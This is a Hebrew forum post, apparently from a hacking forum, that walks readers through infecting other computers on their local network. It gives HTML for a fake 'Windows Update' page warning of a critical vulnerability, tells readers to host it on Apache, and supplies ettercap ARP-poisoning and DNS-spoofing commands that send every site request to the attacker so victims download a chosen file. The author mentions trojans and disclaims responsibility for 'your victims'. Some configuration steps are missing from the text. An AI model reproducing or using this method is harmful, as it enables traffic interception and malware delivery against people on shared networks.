שלום לכל הפורום! הרבה זמן שלא הייתי פה!
החלטתי לעשות מדריך קטן בשביל הפורום למי שרוצה 
אז נתחיל...
דרישות:
- LINUX(מומלץ)
- ETTERCAP
- APACHE SERVER
- כל בכלים האלה מגיעים עם BACKTRACK...
- הקובץ שאותו אתם רוצים להזריק.
איך זה עובד:
1.ניצור קובץ HTML מזוייף של "WINDOWS UPDATE" עם לינק לקובץ שאנחנו רוצים להזריק.
2.נעלה את הקובץ לשרת הAPACHE שלנו ונפעיל אותו.
3.בעזרת ETTERCAP נבצע MITM(מתקפת האדם באמצע) כדי להגיד למחשבים ברשת שלך שלכל אתר שהם יתחברו הם יועברו עליך.
4.וכאשר הם יורידו את הקובץ אז סיימנו את ההזרקה
דרכי פעולה:
1.ליצור קובץ HTML מזוייף:
קוד HTML:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html"; charset=utf-8 />
<title>Windows Update</title>
<style type="text/css">
<!--
style2{
font-family: Arial, Helvetica, sans-serif;
font-weight: blod; font-size: 24px;
color: #999999;
}
--></style>
</head>
<body>
<p align="center" class="style2"><u>Critical Vulnerability</u> in Windows xp, vista and 7. <br \>Download and installation of upgrade required.</p>
<p align="center"><input align="center" type="button" value="Download Update!"onClick="open('/File','download'); return false;"></p></body></html>
רואים את השורה - <p align="center"><input align="center" type="button" value="Download Update!"
onClick="open('/File','download'); return false;"></p>
</body>
</html> ?
אז תחפשו את השם File ובמקומו תרשמו את השם של הקובץ שלכם(בלי מיקום רק שם!)
2.עכשיו תשמרו ותשימו בתיקיית הAPACHE שלכם ותעלו לשם גם את הקובץ, בBACKTRACK התיקייה נמצאת ב:
3.עכשיו נתחיל את תהליך מתקפת האדם באמצע(MITM):
לכו לתיקייה של ettercap - בבאקטראק זה ב:
אבל ע"י הקונסול בעזרת הפקודה CD:
קוד:
cd /usr/share/ettercap
ואז תרשמו:
קוד:
mv -f etter.dns etter.dns.old
זה יחליף את הקובץ הקיים etter.dns בקובץ חדש.
ואחר כך תרשמו את זה:
או:
וזה יפתח לכם כתבן.
ותרשמו שם:
במקום YOURIP תרשמו את האייפי הלוקלי שלכם
צריך את זה כדי לנווט את המחשבים ברשת על המחשב שלך - אפשר לכל אתר: גוגל,פייסבוק או דברים אחרים, כדי לבדוק תרשמו:
ותחפשו שם, ד"א תזכרו גם תחת מה הוא רשום: eth0/wlan0 או wifi0 זה חשוב להמשך...
אחרי שרשמתם תשמרו ותצאו מהכתבן.
מה שעשינו זה להגיד לETTERCAP שאחרי שנבצע את המתקפה זה יעביר את הקורבן אלינו.
ועכשיו למתקפה, תרשמו:
קוד:
ettercap -i INTERFACE -T -q -P dns_spoof -M ARP // //
במקום הINTERFACE תרשמו את מה שהאייפי שלכם היה רשום תחתיו(eth0 זה חיבור עם קבל לרשת, wlan0 או wifi0 זה חיבור אל חוטי, ואם יהיה לכם אחר, לא lo, אז זה חיבור VPN...).
נגיד שאנחנו מחוברים דרך חיבור חוטי, אז נרשום:
קוד:
ettercap -i eth0 -T -q -P dns_spoof -M ARP // //
וזה אמור לבצע את מתקפת האדם באמצע
-i = interface
-P = סוג המתקפה
-M = איזה סוג של הרעלה(במקרה שלנו ARP...)
4.עכשיו תחכו שהוא יתחבר לאינטרנט ויוריד את ה-"UPDATE" וואלה הזרקתם
הערה: כל נזק שנגרם לקורבנות שלכם(הזרקת טרויאן וכדו')לא באחריותי!
קרדיטים: קוד HTML תודה לg0tmi1k הוא חשב על זה, כמובן אפשר כל קוד אחר כמו הורדת משחק או כל דבר אחר...
-מקווה שעזרתי!
-המשך יום נעים
-ספיר שמר.
עריכה:
שיר? תשנה בבקשה את הכותרת ל:
"מדריך - איך להזריק קובץ למחשבים שמחוברים לרשת שלכם או עם חיבור VPN"
תודה.
מדריך - איך להזריק קובץ למחשב שמחוברים לרשת שלכם או עם חיבור VPN.
ציטוט ההודעה
נכתב במקור על ידי Olly
